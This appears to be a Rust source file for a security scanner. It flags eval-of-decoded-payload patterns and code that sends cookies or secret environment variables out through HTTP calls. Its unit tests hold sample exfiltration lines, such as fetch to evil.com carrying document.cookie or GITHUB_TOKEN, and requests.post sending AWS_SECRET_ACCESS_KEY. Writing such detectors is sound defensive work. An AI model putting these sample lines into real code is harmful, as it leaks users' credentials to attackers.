Skip to main content

tirith_core/rules/
codefile.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::rules::shared::SENSITIVE_KEY_VARS;
5use crate::script_analysis::detect_interpreter;
6use crate::verdict::{Evidence, Finding, RuleId, Severity};
7
/// Lowercase file extensions, without the leading dot, that mark a path as a
/// code file eligible for scanning. `is_code_file` compares the lowercased
/// path suffix against this list.
const CODE_EXTENSIONS: &[&str] = &[
    "js", "mjs", "cjs", "ts", "mts", "jsx", "tsx", "py", "pyw", "sh", "bash", "zsh", "fish", "ps1",
    "psm1", "rb", "php", "pl",
];
13
14/// Returns true if the file is a code file that should be scanned.
15pub fn is_code_file(path: Option<&str>, content: &str) -> bool {
16    if let Some(p) = path {
17        let lower = p.to_lowercase();
18        if let Some(ext) = lower.rsplit('.').next() {
19            if CODE_EXTENSIONS.contains(&ext) {
20                return true;
21            }
22        }
23    }
24    // Extensionless files only count as code if a shebang names a known interpreter.
25    if content.starts_with("#!") {
26        let interp = detect_interpreter(content);
27        if !interp.is_empty() {
28            return true;
29        }
30    }
31    false
32}
33
34/// Run code file pattern scanning rules.
35pub fn check(input: &str, file_path: Option<&str>) -> Vec<Finding> {
36    let mut findings = Vec::new();
37
38    check_dynamic_code_execution(input, &mut findings);
39    check_obfuscated_payload(input, &mut findings);
40    check_suspicious_code_exfiltration(input, file_path, &mut findings);
41
42    findings
43}
44
45/// Pairs of regexes that fire when both match within `PROXIMITY_WINDOW` bytes —
46/// the shape of dynamic code evaluation on decoded/obfuscated payloads.
47static DYNAMIC_CODE_PAIRS: Lazy<Vec<(Regex, Regex, &'static str)>> = Lazy::new(|| {
48    vec![
49        // JS: eval( near atob(
50        (
51            Regex::new(r"eval\s*\(").unwrap(),
52            Regex::new(r"atob\s*\(").unwrap(),
53            "eval() near atob()",
54        ),
55        // JS: eval( near String.fromCharCode
56        (
57            Regex::new(r"eval\s*\(").unwrap(),
58            Regex::new(r"String\.fromCharCode").unwrap(),
59            "eval() near String.fromCharCode()",
60        ),
61        // JS: new Function( near encoded content
62        (
63            Regex::new(r"new\s+Function\s*\(").unwrap(),
64            Regex::new(r"(?:atob|String\.fromCharCode|Buffer\.from)\s*\(").unwrap(),
65            "new Function() near encoded content",
66        ),
67        // Python: exec( near b64decode/base64.b64decode
68        (
69            Regex::new(r"exec\s*\(").unwrap(),
70            Regex::new(r"b(?:ase)?64[._]?b?64decode|b64decode").unwrap(),
71            "exec() near b64decode()",
72        ),
73        // Python: exec(compile(
74        (
75            Regex::new(r"exec\s*\(\s*compile\s*\(").unwrap(),
76            Regex::new(r"compile\s*\(").unwrap(),
77            "exec(compile())",
78        ),
79        // Python: exec(__import__(
80        (
81            Regex::new(r"exec\s*\(\s*__import__\s*\(").unwrap(),
82            Regex::new(r"__import__\s*\(").unwrap(),
83            "exec(__import__())",
84        ),
85    ]
86});
87
/// Number of bytes scanned on each side of a match when looking for the
/// companion pattern.
const PROXIMITY_WINDOW: usize = 500;
89
90fn check_dynamic_code_execution(input: &str, findings: &mut Vec<Finding>) {
91    for (pattern_a, pattern_b, description) in DYNAMIC_CODE_PAIRS.iter() {
92        for mat_a in pattern_a.find_iter(input) {
93            // Clamp to UTF-8 char boundaries: ±PROXIMITY_WINDOW offsets can land
94            // inside a multi-byte char (e.g. '═' is 3 bytes). Unclamped byte slicing
95            // would panic at the boundary.
96            let start = safe_start(input, mat_a.start().saturating_sub(PROXIMITY_WINDOW));
97            let end = safe_end(input, mat_a.end() + PROXIMITY_WINDOW);
98            let window = &input[start..end];
99
100            if pattern_b.is_match(window) {
101                findings.push(Finding {
102                    rule_id: RuleId::DynamicCodeExecution,
103                    severity: Severity::Medium,
104                    title: "Dynamic code execution with obfuscation".to_string(),
105                    description: format!("Detected {description} in close proximity"),
106                    evidence: vec![Evidence::CommandPattern {
107                        pattern: description.to_string(),
108                        matched: truncate(
109                            &input[mat_a.start()..safe_end(input, mat_a.end() + 80)],
110                            120,
111                        ),
112                    }],
113                    human_view: None,
114                    agent_view: None,
115                    mitre_id: None,
116                    custom_rule_id: None,
117                });
118                return;
119            }
120        }
121    }
122}
123
/// Matches a decode call (`atob(`, `b64decode(` with an optional `b` string
/// prefix, or `Buffer.from(`) whose first argument is a quoted literal that
/// starts with at least 40 characters from the base64 alphabet. Capture
/// group 1 holds that base64 run.
static OBFUSCATED_DECODE_CALL: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:atob\s*\(\s*["']|b64decode\s*\(\s*b?["']|Buffer\.from\s*\(\s*["'])([A-Za-z0-9+/=]{40,})"#,
    )
    .unwrap()
});
130
/// Matches the opening of an `eval(`, `exec(`, or `Function(` call. The
/// pattern has no word-boundary anchor, so identifiers that merely end in one
/// of these names match as well.
static EXEC_EVAL_NEARBY: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"(?:eval|exec|Function)\s*\(").unwrap());
133
134fn check_obfuscated_payload(input: &str, findings: &mut Vec<Finding>) {
135    for cap in OBFUSCATED_DECODE_CALL.captures_iter(input) {
136        let full_match = cap.get(0).unwrap();
137        // Clamp to UTF-8 char boundaries — see safe_start/safe_end.
138        let start = safe_start(input, full_match.start().saturating_sub(PROXIMITY_WINDOW));
139        let end = safe_end(input, full_match.end() + PROXIMITY_WINDOW);
140        let window = &input[start..end];
141
142        if EXEC_EVAL_NEARBY.is_match(window) {
143            findings.push(Finding {
144                rule_id: RuleId::ObfuscatedPayload,
145                severity: Severity::Medium,
146                title: "Obfuscated payload with decode-execute".to_string(),
147                description:
148                    "Long base64 string decoded and executed — likely obfuscated malicious payload"
149                        .to_string(),
150                evidence: vec![Evidence::CommandPattern {
151                    pattern: "base64 decode + eval/exec".to_string(),
152                    matched: truncate(full_match.as_str(), 120),
153                }],
154                human_view: None,
155                agent_view: None,
156                mitre_id: None,
157                custom_rule_id: None,
158            });
159            return;
160        }
161    }
162}
163
/// Matches the opening of a JS HTTP call: `fetch(`, `axios.<word>(`, or any
/// `.send(`. Every alternative ends on the opening `(`, so the match end is
/// the first byte of the argument list, which is what `find_call_end` expects.
static JS_HTTP_CALL: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"(?:fetch\s*\(|axios\.\w+\s*\(|\.send\s*\()").unwrap());
167
/// Matches the opening of a Python HTTP call: `requests.post(`,
/// `requests.get(`, `requests.put(`, or `urllib.request.<word>(`. Every
/// alternative ends on the opening `(`, so the match end is the first byte of
/// the argument list.
static PY_HTTP_CALL: Lazy<Regex> = Lazy::new(|| {
    Regex::new(r"(?:requests\.(?:post|get|put)\s*\(|urllib\.request\.\w+\s*\()").unwrap()
});
172
173/// Sensitive JS references: document.cookie or process.env.SENSITIVE_KEY
174static JS_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
175    let keys: Vec<String> = SENSITIVE_KEY_VARS
176        .iter()
177        .map(|k| regex::escape(k))
178        .collect();
179    Regex::new(&format!(
180        r"(?:document\.cookie|process\.env\.(?:{}))",
181        keys.join("|")
182    ))
183    .unwrap()
184});
185
186/// Sensitive Python references: os.environ["SENSITIVE_KEY"] or open("/etc/passwd")
187static PY_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
188    let keys: Vec<String> = SENSITIVE_KEY_VARS
189        .iter()
190        .map(|k| regex::escape(k))
191        .collect();
192    Regex::new(&format!(
193        r#"(?:os\.environ\[["'](?:{})["']\]|open\s*\(\s*["']/etc/(?:passwd|shadow)["'][^)]*\))"#,
194        keys.join("|")
195    ))
196    .unwrap()
197});
198
/// Property keywords that indicate data/send context (fire the finding):
/// `body`, `data`, `json`, `params`, or `payload` followed by `:` or `=`.
/// Case-insensitive and unanchored, so a longer identifier that ends in one
/// of these words (e.g. `formData:`) matches too.
static SEND_PROPS: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"(?i)(?:body|data|json|params|payload)\s*[:=]").unwrap());
202
/// Any property-like keyword (`word:` or `word=`, optional whitespace before
/// the separator) — used to detect when a secret is inside an unknown
/// property (like `meta:`) that is NOT a send context.
static GENERIC_PROP: Lazy<Regex> = Lazy::new(|| Regex::new(r"\b\w+\s*[:=]").unwrap());
206
/// Find the end of a call's argument list by matching the closing delimiter.
///
/// `open_pos` must point to the byte AFTER the opening `(`; scanning starts
/// there at nesting depth 1. Returns the byte position just past the
/// delimiter that brings the depth back to 0, or `None` if the input ends
/// first (unbalanced).
///
/// Handles: nested brackets (`()`, `[]`, `{}` are counted interchangeably),
/// string literals (`"`, `'`, `` ` ``) with backslash escapes,
/// block comments (`/* ... */`), line comments (`//`, `#`), and
/// JS regex literals (heuristic: `/` preceded by a non-value byte).
///
/// An unterminated block comment swallows the rest of the input, so the call
/// is reported as unbalanced (`None`) rather than letting a delimiter inside
/// the dangling comment close it.
fn find_call_end(input: &[u8], open_pos: usize) -> Option<usize> {
    let mut depth: u32 = 1;
    let mut i = open_pos;
    let mut in_string: Option<u8> = None;

    while i < input.len() && depth > 0 {
        let b = input[i];
        match in_string {
            Some(q) => {
                // A backslash escapes the next byte, so an escaped quote
                // cannot terminate the string.
                if b == b'\\' && i + 1 < input.len() {
                    i += 2;
                    continue;
                }
                if b == q {
                    in_string = None;
                }
            }
            None => {
                // Block comment `/* ... */`.
                if b == b'/' && i + 1 < input.len() && input[i + 1] == b'*' {
                    i += 2;
                    let mut closed = false;
                    while i + 1 < input.len() {
                        if input[i] == b'*' && input[i + 1] == b'/' {
                            i += 2;
                            closed = true;
                            break;
                        }
                        i += 1;
                    }
                    if !closed {
                        // Everything up to the end of input is comment text;
                        // no closing delimiter can follow.
                        return None;
                    }
                    continue;
                }
                // Line comment: `//` (JS) or `#` (Python/shell). Stop ON the
                // newline so the main loop resumes with it.
                if (b == b'/' && i + 1 < input.len() && input[i + 1] == b'/') || b == b'#' {
                    while i < input.len() && input[i] != b'\n' {
                        i += 1;
                    }
                    continue;
                }
                // JS regex literal `/.../` — heuristic: `/` preceded by something
                // that is NOT a value/identifier token means it can't be division.
                if b == b'/' {
                    // Previous non-whitespace byte, or 0 at the start of input.
                    let prev = {
                        let mut j = i;
                        while j > 0 && matches!(input[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
                            j -= 1;
                        }
                        if j > 0 {
                            input[j - 1]
                        } else {
                            0
                        }
                    };
                    let is_division = prev.is_ascii_alphanumeric()
                        || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
                    if !is_division {
                        // Skip to the closing `/`, honoring backslash escapes,
                        // so brackets inside the regex are not counted.
                        i += 1;
                        while i < input.len() && input[i] != b'/' {
                            if input[i] == b'\\' && i + 1 < input.len() {
                                i += 1;
                            }
                            i += 1;
                        }
                        if i < input.len() {
                            i += 1;
                        }
                        continue;
                    }
                }
                match b {
                    b'"' | b'\'' | b'`' => in_string = Some(b),
                    b'(' | b'[' | b'{' => depth += 1,
                    // Cannot underflow: the loop only runs while depth > 0.
                    b')' | b']' | b'}' => depth -= 1,
                    _ => {}
                }
            }
        }
        i += 1;
    }
    if depth == 0 {
        Some(i)
    } else {
        None
    }
}
297
298fn check_suspicious_code_exfiltration(
299    input: &str,
300    file_path: Option<&str>,
301    findings: &mut Vec<Finding>,
302) {
303    let is_js = file_path
304        .map(|p| {
305            let lower = p.to_lowercase();
306            lower.ends_with(".js")
307                || lower.ends_with(".mjs")
308                || lower.ends_with(".cjs")
309                || lower.ends_with(".ts")
310                || lower.ends_with(".mts")
311                || lower.ends_with(".jsx")
312                || lower.ends_with(".tsx")
313        })
314        .unwrap_or(false);
315
316    let is_py = file_path
317        .map(|p| {
318            let lower = p.to_lowercase();
319            lower.ends_with(".py") || lower.ends_with(".pyw")
320        })
321        .unwrap_or(false);
322
323    // Extensionless files: read the shebang to decide which exfil checker applies.
324    let (is_js, is_py) = if !is_js && !is_py && file_path.is_some() {
325        let interp = detect_interpreter(input);
326        (
327            matches!(interp, "node" | "deno" | "bun"),
328            matches!(interp, "python" | "python3" | "python2"),
329        )
330    } else {
331        (is_js, is_py)
332    };
333
334    if is_js {
335        check_js_exfiltration(input, findings);
336    }
337    if is_py {
338        check_py_exfiltration(input, findings);
339    }
340}
341
/// Walk bytes up to `pos` tracking strings, comments, and bracket depth.
///
/// Returns `(depth, is_code)` for the byte at `pos`:
/// - `depth` is the bracket nesting (`(`, `[`, `{` counted interchangeably)
///   opened before `pos`; it goes negative when closers outnumber openers.
/// - `is_code` is false when `pos` lies inside a string literal, a block or
///   line comment, or a JS regex literal (same heuristic as `find_call_end`).
///
/// Skipped regions are treated as ranges, so a `pos` that falls on a byte the
/// scanner jumps over (the byte after a backslash in a string, the `*` of a
/// `/*` opener, an escaped byte in a regex) is still reported as non-code.
/// If `pos` is at or past the end of `s`, the state at end of input is
/// returned; an unterminated block comment reports `is_code == false`.
fn code_context_at(s: &[u8], pos: usize) -> (i32, bool) {
    let mut depth: i32 = 0;
    let mut in_string: Option<u8> = None;
    let mut i = 0;

    while i < s.len() {
        // `i` can only overshoot `pos` when a string escape consumed it; in
        // that case `in_string` is still set and the answer is "not code".
        if i >= pos {
            return (depth, in_string.is_none());
        }
        let b = s[i];
        if let Some(q) = in_string {
            if b == b'\\' && i + 1 < s.len() {
                i += 2;
                continue;
            }
            if b == q {
                in_string = None;
            }
            i += 1;
            continue;
        }

        // From here on `pos > i`, so `pos < region_end` means `pos` lies
        // strictly inside the region that starts at `i`.

        // Block comment `/* ... */`.
        if b == b'/' && i + 1 < s.len() && s[i + 1] == b'*' {
            let mut j = i + 2;
            let mut comment_end = None;
            while j + 1 < s.len() {
                if s[j] == b'*' && s[j + 1] == b'/' {
                    comment_end = Some(j + 2);
                    break;
                }
                j += 1;
            }
            match comment_end {
                Some(end) if pos >= end => {
                    i = end;
                    continue;
                }
                // Either `pos` is inside the comment, or the comment never
                // closes and therefore covers everything that remains.
                _ => return (depth, false),
            }
        }

        // Line comment: `//` (JS) or `#` (Python/shell), up to the newline.
        if (b == b'/' && i + 1 < s.len() && s[i + 1] == b'/') || b == b'#' {
            let end = s[i..]
                .iter()
                .position(|&c| c == b'\n')
                .map_or(s.len(), |offset| i + offset);
            if pos < end {
                return (depth, false);
            }
            i = end;
            continue;
        }

        // JS regex literal — `/` preceded by a non-value byte cannot be division.
        if b == b'/' {
            // Previous non-whitespace byte, or 0 at the start of input.
            let prev = {
                let mut j = i;
                while j > 0 && matches!(s[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
                    j -= 1;
                }
                if j > 0 {
                    s[j - 1]
                } else {
                    0
                }
            };
            let is_division = prev.is_ascii_alphanumeric()
                || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
            if !is_division {
                let mut j = i + 1;
                while j < s.len() && s[j] != b'/' {
                    if s[j] == b'\\' && j + 1 < s.len() {
                        j += 1;
                    }
                    j += 1;
                }
                // Include the closing `/` when there is one.
                let end = if j < s.len() { j + 1 } else { j };
                if pos < end {
                    return (depth, false);
                }
                i = end;
                continue;
            }
        }

        match b {
            b'"' | b'\'' | b'`' => in_string = Some(b),
            b'(' | b'[' | b'{' => depth += 1,
            b')' | b']' | b'}' => depth -= 1,
            _ => {}
        }
        i += 1;
    }
    (depth, in_string.is_none())
}
433
434/// Decide whether to suppress the exfil finding for a secret at `pos_in_span`
435/// within the HTTP call's argument span.
436///
437/// Logic: find the nearest shallow (depth ≤ 1), in-code property keyword
438/// (`word:` or `word=`) before the secret.
439/// - If it's a SEND keyword (body/data/json/params/payload) → fire (return false)
440/// - If it's anything else (headers, meta, unknown) → suppress (return true)
441/// - If NO property keyword at all → secret is in direct-argument / URL-concat
442///   context → fire (return false)
443fn should_suppress_exfil(arg_span: &str, pos_in_span: usize) -> bool {
444    let before = &arg_span[..pos_in_span];
445    let bytes = before.as_bytes();
446
447    // Find the nearest property-like keyword at shallow depth in actual code.
448    let nearest_prop = GENERIC_PROP
449        .find_iter(before)
450        .filter(|m| {
451            let (depth, is_code) = code_context_at(bytes, m.start());
452            depth <= 1 && is_code
453        })
454        .last();
455
456    match nearest_prop {
457        Some(m) => {
458            if SEND_PROPS.is_match(m.as_str()) {
459                return false;
460            }
461            // Anything else (headers, auth, meta, token, unknown) is too noisy to flag.
462            true
463        }
464        // No surrounding property at all means the secret is a positional/URL arg.
465        None => false,
466    }
467}
468
469fn emit_exfil_finding(findings: &mut Vec<Finding>, call_snippet: &str, sens_str: &str) {
470    findings.push(Finding {
471        rule_id: RuleId::SuspiciousCodeExfiltration,
472        severity: Severity::Medium,
473        title: "Suspicious code exfiltration pattern".to_string(),
474        description: format!(
475            "HTTP call passes sensitive data '{}' as argument — potential data exfiltration",
476            sens_str
477        ),
478        evidence: vec![Evidence::CommandPattern {
479            pattern: "sensitive data inside HTTP call arguments".to_string(),
480            matched: truncate(call_snippet, 120),
481        }],
482        human_view: None,
483        agent_view: None,
484        mitre_id: None,
485        custom_rule_id: None,
486    });
487}
488
489fn check_js_exfiltration(input: &str, findings: &mut Vec<Finding>) {
490    let bytes = input.as_bytes();
491    for http_match in JS_HTTP_CALL.find_iter(input) {
492        let call_end = match find_call_end(bytes, http_match.end()) {
493            Some(end) => end,
494            None => continue,
495        };
496        // `call_end` walks raw bytes and can land inside a multi-byte char on
497        // non-ASCII input; clamp before slicing or we panic on the boundary.
498        let arg_end = safe_end(input, call_end.saturating_sub(1)).max(http_match.end());
499        let arg_span = &input[http_match.end()..arg_end];
500
501        for sens_match in JS_SENSITIVE.find_iter(arg_span) {
502            if should_suppress_exfil(arg_span, sens_match.start()) {
503                continue;
504            }
505            let snippet_end = safe_end(input, call_end.min(input.len()));
506            let snippet = &input[http_match.start()..snippet_end];
507            emit_exfil_finding(findings, snippet, sens_match.as_str());
508            return;
509        }
510    }
511}
512
513fn check_py_exfiltration(input: &str, findings: &mut Vec<Finding>) {
514    let bytes = input.as_bytes();
515    for http_match in PY_HTTP_CALL.find_iter(input) {
516        let call_end = match find_call_end(bytes, http_match.end()) {
517            Some(end) => end,
518            None => continue,
519        };
520        // See check_js_exfiltration for boundary-clamping rationale.
521        let arg_end = safe_end(input, call_end.saturating_sub(1)).max(http_match.end());
522        let arg_span = &input[http_match.end()..arg_end];
523
524        for sens_match in PY_SENSITIVE.find_iter(arg_span) {
525            if should_suppress_exfil(arg_span, sens_match.start()) {
526                continue;
527            }
528            let snippet_end = safe_end(input, call_end.min(input.len()));
529            let snippet = &input[http_match.start()..snippet_end];
530            emit_exfil_finding(findings, snippet, sens_match.as_str());
531            return;
532        }
533    }
534}
535
/// Largest byte index ≤ `target` (itself capped at `s.len()`) that sits on a
/// UTF-8 char boundary of `s`, making it safe to use as a slice end.
fn safe_end(s: &str, target: usize) -> usize {
    let cap = target.min(s.len());
    // Index 0 is always a boundary, so the search cannot come up empty.
    (0..=cap)
        .rev()
        .find(|&idx| s.is_char_boundary(idx))
        .unwrap_or(0)
}
545
/// Smallest byte index ≥ `target` (itself capped at `s.len()`) that sits on a
/// UTF-8 char boundary of `s`. Counterpart of `safe_end`, for the start of a
/// window computed by subtracting an offset
/// (e.g. `mat.start().saturating_sub(500)`).
fn safe_start(s: &str, target: usize) -> usize {
    let len = s.len();
    // `len` is always a boundary, so the search cannot come up empty.
    (target.min(len)..=len)
        .find(|&idx| s.is_char_boundary(idx))
        .unwrap_or(len)
}
556
/// Return `s` unchanged when it has at most `max` chars; otherwise return its
/// first `max` chars followed by `...`. Counts chars, not bytes, so the cut
/// never splits a multi-byte character.
fn truncate(s: &str, max: usize) -> String {
    // A char at index `max` exists exactly when `s` is longer than `max`
    // chars; its byte offset is where the kept prefix ends.
    match s.char_indices().nth(max) {
        Some((cut, _)) => format!("{}...", &s[..cut]),
        None => s.to_string(),
    }
}
565
566#[cfg(test)]
567mod tests {
568    use super::*;
569
570    #[test]
571    fn test_is_code_file_by_extension() {
572        assert!(is_code_file(Some("test.js"), ""));
573        assert!(is_code_file(Some("test.py"), ""));
574        assert!(is_code_file(Some("test.ts"), ""));
575        assert!(is_code_file(Some("test.sh"), ""));
576        assert!(is_code_file(Some("test.ps1"), ""));
577        assert!(!is_code_file(Some("notes.txt"), ""));
578        assert!(!is_code_file(Some("config.json"), ""));
579    }
580
581    #[test]
582    fn test_is_code_file_shebang() {
583        assert!(is_code_file(
584            Some("script"),
585            "#!/usr/bin/env python3\nimport os"
586        ));
587        assert!(is_code_file(Some("run"), "#!/bin/bash\necho hi"));
588        assert!(!is_code_file(Some("data"), "just some text"));
589    }
590
591    #[test]
592    fn test_dynamic_code_eval_atob() {
593        let input = r#"var x = eval(atob("SGVsbG8gV29ybGQ="));"#;
594        let findings = check(input, Some("test.js"));
595        assert!(
596            findings
597                .iter()
598                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
599            "eval+atob should fire DynamicCodeExecution"
600        );
601    }
602
603    #[test]
604    fn test_dynamic_code_exec_b64decode() {
605        let input = r#"exec(b64decode("SGVsbG8gV29ybGQ="))"#;
606        let findings = check(input, Some("test.py"));
607        assert!(
608            findings
609                .iter()
610                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
611            "exec+b64decode should fire DynamicCodeExecution"
612        );
613    }
614
615    #[test]
616    fn test_bare_eval_no_fire() {
617        let input = "eval(someVar);";
618        let findings = check(input, Some("test.js"));
619        assert!(
620            !findings
621                .iter()
622                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
623            "bare eval should not fire"
624        );
625    }
626
627    #[test]
628    fn test_eval_atob_distant_no_fire() {
629        let padding = "x".repeat(600);
630        let input = format!("eval(something);\n{padding}\natob('SGVsbG8=');");
631        let findings = check(&input, Some("test.js"));
632        assert!(
633            !findings
634                .iter()
635                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
636            "distant eval+atob should not fire"
637        );
638    }
639
640    #[test]
641    fn test_obfuscated_payload() {
642        let b64 = "A".repeat(50);
643        let input = format!(r#"eval(atob("{b64}"))"#);
644        let findings = check(&input, Some("test.js"));
645        assert!(
646            findings
647                .iter()
648                .any(|f| f.rule_id == RuleId::ObfuscatedPayload),
649            "long base64 in atob near eval should fire ObfuscatedPayload"
650        );
651    }
652
653    #[test]
654    fn test_exfil_fetch_cookie() {
655        let input = r#"fetch("https://evil.com/?d=" + document.cookie)"#;
656        let findings = check(input, Some("test.js"));
657        assert!(
658            findings
659                .iter()
660                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
661            "fetch + document.cookie should fire"
662        );
663    }
664
665    #[test]
666    fn test_exfil_fetch_env_token() {
667        let input = r#"fetch(url, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
668        let findings = check(input, Some("test.js"));
669        assert!(
670            findings
671                .iter()
672                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
673            "fetch + process.env.GITHUB_TOKEN in body should fire"
674        );
675    }
676
677    #[test]
678    fn test_exfil_auth_header_no_fire() {
679        let input = r#"fetch("/api/login", {headers: {"Authorization": "Bearer " + process.env.GITHUB_TOKEN}})"#;
680        let findings = check(input, Some("test.js"));
681        assert!(
682            !findings
683                .iter()
684                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
685            "Authorization header pattern should NOT fire"
686        );
687    }
688
689    #[test]
690    fn test_exfil_python_requests() {
691        let input = r#"requests.post(url, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
692        let findings = check(input, Some("test.py"));
693        assert!(
694            findings
695                .iter()
696                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
697            "requests.post + secret env should fire"
698        );
699    }
700
701    #[test]
702    fn test_normal_fetch_no_fire() {
703        let input = r#"fetch("/api/data").then(r => r.json())"#;
704        let findings = check(input, Some("test.js"));
705        assert!(
706            !findings
707                .iter()
708                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
709            "normal fetch should not fire"
710        );
711    }
712
713    #[test]
714    fn test_not_code_file_no_fire() {
715        let input = r#"eval(atob("SGVsbG8gV29ybGQ="));"#;
716        assert!(!is_code_file(Some("notes.txt"), input));
717    }
718
719    #[test]
720    fn test_internal_post_body_no_fire() {
721        let input = r#"requests.post("https://internal-api.example.com/log", json={"event": "login", "user": username})"#;
722        let findings = check(input, Some("test.py"));
723        assert!(
724            !findings
725                .iter()
726                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
727            "internal API POST without sensitive data should not fire"
728        );
729    }
730
731    #[test]
732    fn test_exfil_js_meta_property_no_fire() {
733        let input = r#"fetch(url, {meta: process.env.GITHUB_TOKEN})"#;
734        let findings = check(input, Some("test.js"));
735        assert!(
736            !findings
737                .iter()
738                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
739            "secret in non-send property 'meta:' should NOT fire"
740        );
741    }
742
743    #[test]
744    fn test_exfil_python_meta_kwarg_no_fire() {
745        let input = r#"requests.post(url, meta=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
746        let findings = check(input, Some("test.py"));
747        assert!(
748            !findings
749                .iter()
750                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
751            "secret in non-send kwarg 'meta=' should NOT fire"
752        );
753    }
754
755    #[test]
756    fn test_exfil_js_token_property_no_fire() {
757        let input = r#"fetch(url, {token: process.env.GITHUB_TOKEN})"#;
758        let findings = check(input, Some("test.js"));
759        assert!(
760            !findings
761                .iter()
762                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
763            "secret in non-send property 'token:' should NOT fire"
764        );
765    }
766
767    #[test]
768    fn test_exfil_query_concat_fires() {
769        let input = r#"fetch("https://evil.com/c?token=" + process.env.GITHUB_TOKEN)"#;
770        let findings = check(input, Some("test.js"));
771        assert!(
772            findings
773                .iter()
774                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
775            "URL query concat with secret should fire"
776        );
777    }
778
779    #[test]
780    fn test_exfil_separate_statement_no_fire() {
781        // Regression: secret lives in a separate statement, not in the fetch call's args.
782        let input = r#"fetch(url); const payload = { token: process.env.GITHUB_TOKEN };"#;
783        let findings = check(input, Some("test.js"));
784        assert!(
785            !findings
786                .iter()
787                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
788            "secret in separate statement (not in call args) should NOT fire"
789        );
790    }
791
792    #[test]
793    fn test_exfil_unrelated_body_object_no_fire() {
794        // body: keyword exists nearby but belongs to unrelated local object
795        let input = r#"fetch(url); const opts = { body: bodyVar }; const token = process.env.GITHUB_TOKEN;"#;
796        let findings = check(input, Some("test.js"));
797        assert!(
798            !findings
799                .iter()
800                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
801            "unrelated body object near fetch should NOT fire"
802        );
803    }
804
805    #[test]
806    fn test_exfil_document_cookie_not_sent_no_fire() {
807        // document.cookie is read but not passed as argument to the fetch call
808        let input = r#"fetch(url); console.log(document.cookie);"#;
809        let findings = check(input, Some("test.js"));
810        assert!(
811            !findings
812                .iter()
813                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
814            "document.cookie outside call args should NOT fire"
815        );
816    }
817
818    #[test]
819    fn test_exfil_document_cookie_inside_call_fires() {
820        // document.cookie IS passed inside the fetch call's args
821        let input = r#"fetch("https://evil.com/?c=" + document.cookie)"#;
822        let findings = check(input, Some("test.js"));
823        assert!(
824            findings
825                .iter()
826                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
827            "document.cookie inside call args should fire"
828        );
829    }
830
831    #[test]
832    fn test_exfil_block_comment_in_args() {
833        // `)` inside a block comment must not terminate the arg span
834        let input =
835            r#"fetch(url /* ) */, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
836        let findings = check(input, Some("test.js"));
837        assert!(
838            findings
839                .iter()
840                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
841            "block comment with ) inside call args should not break parser"
842        );
843    }
844
845    #[test]
846    fn test_exfil_python_line_comment_in_args() {
847        // `#` line comment with `)` must not terminate the arg span
848        let input = "requests.post(url, # )\n    data=os.environ[\"AWS_SECRET_ACCESS_KEY\"])";
849        let findings = check(input, Some("test.py"));
850        assert!(
851            findings
852                .iter()
853                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
854            "Python # comment with ) inside call args should not break parser"
855        );
856    }
857
858    #[test]
859    fn test_exfil_js_regex_literal_in_args() {
860        // regex literal /\(/ must not throw off delimiter counting
861        let input = r#"fetch(url, {body: /\(/, json: process.env.GITHUB_TOKEN})"#;
862        let findings = check(input, Some("test.js"));
863        assert!(
864            findings
865                .iter()
866                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
867            "JS regex literal with ( should not break parser"
868        );
869    }
870
871    #[test]
872    fn test_find_call_end_block_comment() {
873        let input = b"url /* ) */, data)";
874        assert_eq!(find_call_end(input, 0), Some(18));
875    }
876
877    #[test]
878    fn test_find_call_end_line_comment() {
879        let input = b"url, # )\n    data)";
880        assert_eq!(find_call_end(input, 0), Some(18));
881    }
882
883    #[test]
884    fn test_find_call_end_regex_literal() {
885        let input = br#"url, {body: /\(/, val})"#;
886        assert_eq!(find_call_end(input, 0), Some(23));
887    }
888
889    #[test]
890    fn test_exfil_headers_then_body_fires() {
891        let input = r#"fetch(url, {headers: {Authorization: auth}, body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
892        let findings = check(input, Some("test.js"));
893        assert!(
894            findings
895                .iter()
896                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
897            "secret in body after headers in same call should fire"
898        );
899    }
900
901    #[test]
902    fn test_exfil_python_headers_then_data_fires() {
903        let input =
904            r#"requests.post(url, headers=headers, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
905        let findings = check(input, Some("test.py"));
906        assert!(
907            findings
908                .iter()
909                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
910            "secret in data= after headers= in same call should fire"
911        );
912    }
913
914    #[test]
